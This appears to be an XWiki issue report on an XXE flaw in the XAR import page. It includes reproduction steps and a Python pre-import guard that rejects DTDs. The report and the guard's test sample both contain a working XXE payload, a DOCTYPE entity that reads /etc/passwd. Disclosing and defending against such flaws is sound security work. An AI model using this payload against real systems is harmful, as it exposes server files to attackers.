XWiki Platform / XWIKI-20320

XXE attack on the import XAR Admin UI

Description

  To reproduce:

  • Create a XAR package and modify its package.xml like this:

        <?xml version="1.0" encoding="UTF-8"?>
        <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

        <package>
          <infos>
            <name>&xxe;</name>
            <description> &xxe; Helper pages for creating and listing Class/Template/Sheets</description>
            <licence></licence>
            <author>XWiki.Admin</author>
            ...

  • Go to the Admin UI > Import.
  • Notice that the import page displays the content of /etc/passwd.
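
  A pre-import guard for this class of problem, as an added example that is not XWiki's own code: it opens the XAR (a ZIP archive with package.xml at its root), parses package.xml with expat, and refuses the file as soon as a DOCTYPE or entity declaration is seen, before any entity can be resolved. The benign and malicious package.xml samples below are constructed here and trimmed to the <infos> block; the class and function names (UnsafeXml, parse_package_infos, check_xar, build_xar) are the example's own.

```python
"""
Pre-import guard for XAR packages (added example; not XWiki's own code).

A XAR is a ZIP archive whose root contains package.xml. The report above
shows that a DOCTYPE with an external entity in that file makes the
importer disclose local files. This guard parses package.xml with expat
but rejects any DOCTYPE or entity declaration before a single entity can
be resolved, and returns the package name on success.
"""
import io
import zipfile
import xml.parsers.expat


class UnsafeXml(ValueError):
    """Raised when package.xml contains a DOCTYPE or entity declaration."""


def parse_package_infos(data: bytes) -> dict:
    """Parse package.xml and return the text of each <package><infos> child.

    Raises UnsafeXml on any DOCTYPE/entity declaration and
    xml.parsers.expat.ExpatError on malformed XML.
    """
    parser = xml.parsers.expat.ParserCreate()
    parser.buffer_text = True

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Refusing the DTD outright means no entity (internal or external)
        # can ever be declared, so there is nothing left for the parser to resolve.
        raise UnsafeXml(f"DOCTYPE not allowed in package.xml (root {name!r}, system id {sysid!r})")

    def on_entity_decl(*_args):
        raise UnsafeXml("entity declaration not allowed in package.xml")

    stack, text, infos = [], [], {}

    def on_start(name, _attrs):
        stack.append(name)
        text.clear()

    def on_chars(chunk):
        text.append(chunk)

    def on_end(name):
        # Only direct children of <package><infos> are recorded.
        if stack[:2] == ["package", "infos"] and len(stack) == 3:
            infos[name] = "".join(text).strip()
        stack.pop()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_chars
    parser.EndElementHandler = on_end
    parser.Parse(data, True)
    return infos


def check_xar(xar_bytes: bytes) -> tuple[bool, str]:
    """Return (True, package name) if the XAR may be imported, else (False, reason)."""
    try:
        with zipfile.ZipFile(io.BytesIO(xar_bytes)) as zf:
            if "package.xml" not in zf.namelist():
                return False, "XAR has no package.xml"
            infos = parse_package_infos(zf.read("package.xml"))
    except zipfile.BadZipFile as exc:
        return False, f"not a ZIP archive: {exc}"
    except UnsafeXml as exc:
        return False, f"rejected: {exc}"
    except xml.parsers.expat.ExpatError as exc:
        return False, f"malformed package.xml: {exc}"
    if "name" not in infos:
        return False, "package.xml has no <package><infos><name>"
    return True, infos["name"]


def build_xar(package_xml: str) -> bytes:
    """Build an in-memory XAR containing only package.xml (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("package.xml", package_xml)
    return buf.getvalue()


# Constructed samples: a benign package.xml trimmed to the <infos> block,
# and the same file with the DOCTYPE from the report above.
BENIGN_PACKAGE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<package>
  <infos>
    <name>Helper pages</name>
    <description>Helper pages for creating and listing Class/Template/Sheets</description>
    <licence></licence>
    <author>XWiki.Admin</author>
  </infos>
</package>
"""

XXE_PACKAGE_XML = BENIGN_PACKAGE_XML.replace(
    "<package>",
    '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>\n<package>',
).replace("<name>Helper pages</name>", "<name>&xxe;</name>")


if __name__ == "__main__":
    print(check_xar(build_xar(BENIGN_PACKAGE_XML)))  # (True, 'Helper pages')
    print(check_xar(build_xar(XXE_PACKAGE_XML)))     # (False, 'rejected: DOCTYPE not allowed ...')
    print(check_xar(b"not a zip"))                   # (False, 'not a ZIP archive: ...')
```

  Rejecting every DOCTYPE is deliberately stricter than disabling external entities alone: it also rules out internal-entity expansion and parameter-entity tricks, and a package.xml has no legitimate use for a DTD. For a Java importer the equivalent setting is the Xerces feature http://apache.org/xml/features/disallow-doctype-decl on the DocumentBuilderFactory or SAXParserFactory that parses the package descriptor.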

People

  vmassol Vincent Massol